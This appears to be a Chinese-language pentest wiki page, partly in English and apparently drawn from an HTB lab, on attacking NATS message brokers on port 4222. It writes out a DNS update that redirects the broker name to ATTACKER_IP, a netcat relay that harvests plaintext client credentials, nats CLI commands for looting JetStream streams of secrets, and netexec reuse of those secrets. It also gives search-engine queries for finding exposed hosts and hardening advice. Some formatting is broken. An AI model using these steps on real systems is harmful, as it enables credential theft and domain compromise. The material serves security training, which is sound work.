4222 - Nats

💡 学习提示: 本文档介绍 4222 - NATS 的渗透测试方法,适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

update add nats-svc.domain.local 60 A ATTACKER_IP send

+ Mirror the legitimate banner once, then replay it to every connecting client. NATS trusts the first `INFO` line it sees, so we only need to pipe it through a listener:

```bash
nc REAL_NATS 4222 | head -1 | nc -lnvp 4222
  • As soon as an internal client resolves the hijacked name, it will emit a plaintext CONNECT frame containing the user / pass pair and various telemetry (client name, Go version, protocol level). Because nothing past the INFO banner is required, even nc is enough to harvest secrets.
  • For longer engagements, run the official server locally (git clone https://github.com/nats-io/nats-server && go build && ./nats-server -V). TRACE logging already shows usernames; removing the redaction helper or sniffing traffic with Wireshark reveals the full password.

JetStream looting & password hunting

Once any credential is recovered (e.g. Dev_Account_A), store it as a CLI context to avoid retyping:

nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!'

JetStream discovery usually follows this pattern:

nats account info --context mirage      # quotas, stream count, expiration
nats stream list --context mirage       # names + message totals
nats stream info auth_logs --context mirage
nats stream view auth_logs --context mirage

Streaming teams frequently log authentication events into subjects such as logs.auth. If developers persist the raw JSON into a JetStream stream, the payloads may include plaintext AD usernames and passwords:

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}

Retained secrets can then be replayed against Kerberos-only services using netexec smb DC01 -u USER -p PASS -k, enabling full domain compromise.

Hardening & detection

  • Enforce TLS (tls, tls_required, or mTLS via nkey/creds). Without encryption, INFO/CONNECT leaks credentials to anyone on-path.
  • Pinpoint who can update DNS – delegate service records to dedicated accounts and audit Event IDs 257/252 for high-value hostnames. Combine with scavenging alerts so missing broker names cannot be silently re-claimed.
  • Disable credential logging. Scrub secrets before publishing to subjects, set JetStream retention/age limits, and apply deny_delete=false only to trusted operators.

搜索引擎语法

FOFA

# FOFA 搜索语法
port="4222"

Shodan

# Shodan 搜索语法
port:4222

ZoomEye

# ZoomEye 搜索语法
port:4222

📖 参考资料